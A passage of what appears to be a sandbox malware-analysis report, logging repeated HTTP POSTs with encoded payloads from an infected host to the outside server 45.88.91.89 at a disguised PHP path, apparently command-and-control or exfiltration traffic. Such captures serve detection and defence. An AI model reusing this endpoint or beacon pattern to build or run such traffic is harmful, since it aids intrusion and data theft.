                                                      Dec 13, 2024 14:34:23.391490936 CET | 2564 | OUT | Data Raw: 56 5b 58 58 53 58 50 52 5b 5f 52 55 59 59 57 58 57 59 5f 5b 50 5a 56 5a 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: V[XXSXPR[_RUYYWXWY_[PZVZ_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!,<40+W><Z%,+$<]<'<3+)Y#'Z$-"3 ^8$[' \,*
                                                      Dec 13, 2024 14:34:24.149754047 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:24.385487080 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:24 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      83 | 192.168.2.6 | 50077 | 45.88.91.89 | 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:24.634208918 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      84 | 192.168.2.6 | 50078 | 45.88.91.89 | 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:24.762093067 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1428
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:25.110404968 CET | 1428 | OUT | Data Raw: 56 50 5d 52 56 5a 50 53 5b 5f 52 55 59 5d 57 5a 57 5c 5f 53 50 5a 56 5a 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VP]RVZPS[_RUY]WZW\_SPZVZ_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!Z9<7$3T<8$/7$?+_+#'89Z 1/$>>0./$[' \,6
                                                      Dec 13, 2024 14:34:25.852176905 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:26.085760117 CET | 349 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:25 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 39 38 0d 0a 00 1a 27 58 28 07 28 0b 32 28 2c 51 24 2d 26 02 3d 11 21 58 2e 11 2f 03 27 1a 20 09 3f 23 26 1c 3e 34 37 12 2a 1d 29 11 23 01 20 1c 2e 1c 2f 5f 0d 11 3b 07 23 00 36 5d 38 04 30 00 29 3e 31 5f 3f 01 36 00 29 58 23 04 24 28 39 0f 26 13 32 51 28 00 23 57 3c 28 38 16 2e 2f 2e 05 25 0f 2f 57 0d 1e 27 19 29 22 2a 03 20 2b 24 5f 21 04 36 03 2a 37 3d 0d 21 29 23 10 31 00 3d 5e 25 02 3c 52 34 0d 0d 03 25 55 37 1d 27 39 2b 1c 24 2f 2e 50 2a 00 29 51 0f 32 54 54 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 98'X((2(,Q$-&=!X./' ?#&>47*)# ./_;#6]80)>1_?6)X#$(9&2Q(#W<(8./.%/W')"* +$_!6*7=!)#1=^%<R4%U7'9+$/.P*)Q2TT0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      85 | 192.168.2.6 | 50079 | 45.88.91.89 | 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:24.953876972 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2564
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:25.297841072 CET | 2564 | OUT | Data Raw: 53 57 58 5c 56 5f 50 50 5b 5f 52 55 59 59 57 58 57 53 5f 5c 50 59 56 53 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SWX\V_PP[_RUYYWXWS_\PYVS_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[",,\$-;>?+'/73?'<43(*"!02!C'X,8-$[' \,*
                                                      Dec 13, 2024 14:34:26.045969963 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:26.315097094 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:25 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      86 | 192.168.2.6 | 50080 | 45.88.91.89 | 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:26.557954073 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:34:26.907764912 CET | 2568 | OUT | Data Raw: 56 54 58 58 53 59 55 55 5b 5f 52 55 59 5b 57 5b 57 5b 5f 5c 50 5d 56 5d 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VTXXSYUU[_RUY[W[W[_\P]V]_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!Z. 3$?'$?/%/8+$(*7/[1%C3,$[' \,.
                                                      Dec 13, 2024 14:34:27.643755913 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:27.877628088 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:27 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      87 | 192.168.2.6 | 50081 | 45.88.91.89 | 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:28.120980024 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:28.469629049 CET | 2568 | OUT | Data Raw: 53 50 58 5b 53 5e 55 53 5b 5f 52 55 59 5f 57 5e 57 59 5f 5e 50 58 56 52 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SPX[S^US[_RUY_W^WY_^PXVR_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[":?Z$>((<$0<S'<3?$$8)_#,2X%@0-?8-$[' \,>
                                                      Dec 13, 2024 14:34:29.220496893 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:29.456084967 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:29 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      88 | 192.168.2.6 | 50082 | 45.88.91.89 | 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:29.697690964 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:30.047861099 CET | 2568 | OUT | Data Raw: 53 50 58 5c 53 59 55 53 5b 5f 52 55 59 50 57 5e 57 5d 5f 5e 50 59 56 5b 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SPX\SYUS[_RUYPW^W]_^PYV[_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!9,#3>?R<<83($,+?$[$&42$&&',-=$[' \,
                                                      Dec 13, 2024 14:34:30.791728020 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:31.025721073 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:30 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      89 | 192.168.2.6 | 50084 | 45.88.91.89 | 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:31.283363104 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:31.641500950 CET | 2568 | OUT | Data Raw: 53 50 58 5e 56 5a 55 54 5b 5f 52 55 59 5e 57 58 57 53 5f 59 50 5b 56 52 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SPX^VZUT[_RUY^WXWS_YP[VR_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!^:3$? %?0R'7X<$;^$8* !32=*'=?;=$[' \,
                                                      Dec 13, 2024 14:34:32.369484901 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:32.601299047 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:32 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      90 | 192.168.2.6 | 50085 | 45.88.91.89 | 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:32.843421936 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:34:33.188437939 CET | 2568 | OUT | Data Raw: 56 5b 5d 52 53 5b 50 57 5b 5f 52 55 59 51 57 58 57 5a 5f 53 50 58 56 5d 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: V[]RS[PW[_RUYQWXWZ_SPXV]_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[".Z#$<>/8Z0/ V0/<(;^&;Y 'X$.6%><,$[' \,
                                                      Dec 13, 2024 14:34:33.953708887 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:34.189742088 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:33 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      91 | 192.168.2.6 | 50086 | 45.88.91.89 | 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:34.430922985 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:34.782191038 CET | 2568 | OUT | Data Raw: 56 57 5d 5e 56 5d 55 50 5b 5f 52 55 59 5e 57 53 57 52 5f 53 50 5a 56 58 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VW]^V]UP[_RUY^WSWR_SPZVX_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX["9?,0=,<,73%,']?;$%#?%.G3+,$[' \,
                                                      Dec 13, 2024 14:34:35.520663023 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:35.754110098 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:35 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      92 | 192.168.2.6 | 50087 | 45.88.91.89 | 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:35.997534990 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      93 | 192.168.2.6 | 50088 | 45.88.91.89 | 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:36.309722900 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1456
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:36.657773018 CET | 1456 | OUT | Data Raw: 56 52 5d 5c 53 58 50 52 5b 5f 52 55 59 5a 57 5f 57 5f 5f 59 50 5c 56 5a 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VR]\SXPR[_RUYZW_W__YP\VZ_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[![.<$&>'V<?7$?0S$(7?'7"3X%>@'(,$[' \,*
                                                      Dec 13, 2024 14:34:37.395003080 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:37.629379034 CET | 349 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:37 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 39 38 0d 0a 00 1a 27 12 3c 07 05 1c 25 02 24 51 25 2d 07 5b 2b 3f 0b 13 2d 2c 28 10 33 1a 0d 1c 2a 23 3e 1c 3d 1a 0e 03 3d 30 3a 01 23 2c 38 54 3a 0c 2f 5f 0d 11 38 1d 23 3d 2a 58 2c 2d 09 10 29 10 3e 04 3f 11 39 11 29 10 24 10 27 3b 39 0d 32 03 03 0c 2b 07 3f 1f 3f 05 30 17 2c 2f 29 14 32 1f 2f 57 0d 1e 24 0c 2b 22 17 5e 22 28 3f 05 22 04 3e 07 3e 0a 22 10 22 39 27 1f 31 00 0c 02 27 2c 3c 54 21 30 28 1f 26 55 33 57 27 39 3f 11 24 2f 2e 50 2a 00 29 51 0f 32 54 54 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 98'<%$Q%-[+?-,(3*#>==0:#,8T:/_8#=*X,-)>?9)$';92+??0,/)2/W$+"^"(?">>""9'1',<T!0(&U3W'9?$/.P*)Q2TT0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      94 | 192.168.2.6 | 50089 | 45.88.91.89 | 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:36.429466963 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:36.785378933 CET | 2568 | OUT | Data Raw: 53 52 5d 53 56 58 55 5e 5b 5f 52 55 59 50 57 58 57 53 5f 5a 50 59 56 5a 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SR]SVXU^[_RUYPWXWS_ZPYVZ_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX["-3.3<,%? %,8('7<2'>^-=$[' \,
                                                      Dec 13, 2024 14:34:37.515966892 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:37.749526978 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:37 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      95 | 192.168.2.6 | 50090 | 45.88.91.89 | 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:37.995688915 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:34:38.344762087 CET | 2568 | OUT | Data Raw: 53 50 58 59 53 5e 55 5e 5b 5f 52 55 59 5e 57 5e 57 59 5f 59 50 59 56 52 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SPXYS^U^[_RUY^W^WY_YPYVR_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!^.,$$,<<\%,3$Z7_+7<3!4#&>5G'+;$[' \,
                                                      Dec 13, 2024 14:34:39.084698915 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:39.321382046 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:38 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      96 | 192.168.2.6 | 50091 | 45.88.91.89 | 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:39.566565990 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:39.922734976 CET | 2568 | OUT | Data Raw: 56 5b 58 58 56 55 50 52 5b 5f 52 55 59 58 57 53 57 52 5f 5e 50 5c 56 5c 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
